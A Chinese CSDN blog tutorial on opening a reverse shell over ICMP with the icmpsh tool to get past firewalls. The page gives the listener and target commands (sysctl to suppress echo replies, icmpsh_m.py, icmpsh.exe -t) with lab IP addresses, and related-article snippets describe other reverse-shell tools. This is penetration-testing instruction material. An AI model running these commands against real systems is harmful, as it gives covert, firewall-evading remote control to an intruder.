通过ICMP协议反弹SHELL并执行命令

最新推荐文章于 2024-05-17 08:10:56 发布
最新推荐文章于 2024-05-17 08:10:56 发布
阅读量1.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/103572844
版权

内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。

使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他的工具sqlmap中,可以使用-os-pwn选项来发起攻击。

以下命令将禁止ICMP回显,这对于工具正常使用是至关重要的,启动一个监听器,该监听器将等待目标主机的ICMP数据包:

sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4

icmpsh工具中还包含需要在目标主机上传输和执行的二进制文件。以下命令将向监听主机发送ICMP包:

icmpsh.exe -t 192.168.100.3

ICMP Shell – Executing Binary

一个shell将通过ICMP接收,并且也可以通过这个管道来执行命令。

最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用ICMP协议反弹shell
不忘初心,护天下安全!
07-20 1063
网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。ICMP(InternetControlMessageProtocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。...
icmp实现shell反弹
qq_45833409的博客
02-01 246
#概述 1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。 2.发送端向接收端发送icmp包后,接收端过滤icmp包后获得发送端发出的icmp包再解包和解密,当口令正确,解析icmp_data段的ip和port。 3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了. 源码 发送端 #include <stdio.h&gt
icmpsh之icmp反弹shell
weixin_45729208的博客
03-31 327
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
sqlmap 如何 --os-shell反弹shell_sqlmap跑shell(1)
最新发布
2401_84281594的博客
05-17 676
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
内网渗透之 ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5066
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
nishangICMP反弹shell攻击
wodepzw的博客
11-19 288
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
icmp-remote-shell:使用ICMP协议进行数据隐藏的隐写术远程Shell的原型
05-14
ICMP远程外壳 使用ICMP协议进行数据隐藏的隐写术远程Shell的原型。 要安装数据包,请使用pip: pip install icmp_remote_shell Packet提供了一些可以在您的ICMP隐写术项目中使用的常用功能: 校验和-计算数据包校验...
HC110110004 ICMP协议
01-05
Ping是使用ICMP Echo Request报文来查询某些信息,并通过ICMP Echo Reply报文来响应,进行差错检测。Tracert是使用ICMP Echo Request报文来跟踪数据包的传输路径,了解网络拓扑结构。 ICMP报文类型有很多种,每种...
ICMP协议pcap数据包下载;ICMP协议报文解析
03-24
ICMP协议pcap数据包下载,支持抓包软件(如:wireshark)打开并学习ICMP协议报文解析。需要其他协议,请查看我发布的其他资源。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
文档详细介绍了按照交互方式划分的五种类型的反弹shell姿势,并举例说明了间断类的特征,如awk和tclsh的使用,演示了如何在网络连接和命令执行间断的情况下建立控制。 作者强调,传统的交互式与非交互式的分类过于...
ICMP协议 作者文章电子版 需要的下载
06-03
总的来说,ICMP协议是网络诊断和故障排除的重要工具,它通过向网络发送特定类型的报文并接收响应,帮助网络管理员理解网络状态,定位和解决网络问题。同时,ICMP也是IP协议栈不可或缺的一部分,为网络通信提供了必要...
好用的cmdshell反弹工具
06-19
好用的cmdshell反弹工具;好用的cmdshell反弹工具
icmp反弹shell 简介
whatday的专栏
04-09 976
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起。当年的网费还是挺贵的,大学生上个网还是容易“破产”呀。当你的网费耗尽后,网管服务器就会拦截你的网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以的,于是就开始琢磨利用icmp隧道将访问转发到自己的一台放置在公网中的代理,利用代...
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 753
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
winexec函数 执行powershell 脚本_powershell搭建icmp隧道
weixin_39655160的博客
12-05 248
说明与其说是powershell搭建icmp隧道,不如说是icmpsh+powershell搭建的。icmpsh的使用可以参考上上篇的文章,它是在攻击机执行icmpsh_m.py文件,然后在受害机执行的icmpsh.exe。现在针对powershell的方法,就是把icmpsh.exe换成powershell脚本。攻击机还是运行icmpsh_m.py。像之前的icmpsh.exe是只能...
revshell 一款非常好用的生成反弹Shell命令的工具
ak.Gh0st的博客
08-09 813
revshell是一个由Go语言编写的反弹Shell工具,它是Reverse Shell Generator的命令行版本,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。目前支持的类型:除了支持多种Shell类型外,revshell还可以运行在多个操作系统平台上,包括Mac、Linux和Windows。这使得用户可以在不同的环境中使用revshell来生成适用于目标主机操作系统的反弹Shell代码,提高了工具的灵活性和适用性。
渗透测试-window反弹shell
lza20001103的博客
05-11 4321
window反弹shell
shell 工具_ReverseTCPShell C2 反弹shell工具
weixin_39520880的博客
11-26 152
ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。测试:1. 在文件目录下启动powershell2. .ReverseTCP.ps1 ,启动程序会出现这个界面,功能介绍,设置好lhost和lport(监听地址及端口)Modules (模块) | - Show C2-Server Mo...
ICMP协议 命令
08-18
ICMP(Internet Control Message Protocol)是一种用于在IP网络中传递错误消息和操作控制消息的协议。下面是一些常用的与ICMP协议相关的命令集...使用这些命令可以发送ICMP消息并接收响应,以便了解网络的状态和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值